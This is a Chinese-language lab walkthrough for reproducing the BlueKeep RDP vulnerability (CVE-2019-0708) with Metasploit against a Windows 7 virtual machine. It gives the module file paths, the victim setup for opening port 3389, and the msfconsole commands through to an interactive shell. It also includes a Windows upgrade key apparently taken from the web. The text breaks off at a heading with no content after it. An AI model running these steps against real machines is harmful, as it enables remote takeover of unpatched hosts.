CVE 2019 0708 RDP MSF漏洞利用

cve-2019-0708 rdp msf漏洞復現

漏洞環境

使用 vmware 安裝windows7 x64 模擬受害機

kali msf 攻擊準備：

1，metasploit-framework， kali msf 需更新到最新版本，如果正常開啟輸入：msfupdate 進行更新，如果啟動msf報錯，可以解除安裝重新安裝：

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

window7 x64 攻擊準備：

點選開始，找到windows anytime upgrade

這裡輸入金鑰：6k2ky-bfh24-pjw6w-9gk29-tmpwp

下一步，驗證金鑰，等待驗證金鑰。如果金鑰驗證成功，會出現請接受許可條款，如果金鑰驗證不成功，則下面的步驟不可用，那可以返回，重新在網上找公升級金鑰，直至金鑰驗證成功。點我接受，公升級系統大概花10分鐘的時間，聯網公升級，在公升級過程中，電腦會重啟數次，認真等待。

2，開啟3389埠，允許遠端桌面連線；修改高階共享設定，預設是關閉的；

啟動遠端桌面服務，預設是禁止的；

修改防火牆設定，增加一條允許連線tcp 3389埠的出站入站記錄；

這樣就可以開啟遠端連線了，一般是允許遠端桌面連線和啟動遠端桌面服務就可以了，如果仍然不行的話就把上面的準備全部操作一遍。

進行攻擊：

使用 msfconsole 進入 metasploit-framework

使用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 啟用 0708rdp 攻擊模組

使用 show options 檢視相關資訊和設定

關鍵設定主要為 rhosts / rport / target

set rhosts 受害機ip設定受害機ip

set rport 受害機port設定受害機rdp埠號

set target id數字(可選為0-4)設定受害機機器架構

使用的是vmware，那麼 target 2 滿足條件

使用 exploit 開始攻擊，等待建立連線

建立連線以後，使用shell獲得shell，再使用python獲得互動式 shell

完成攻擊，成功拿到受害者主機許可權。

打完收工。

提取碼: fiwx

提取碼: kw7b

受影響windows系統版本：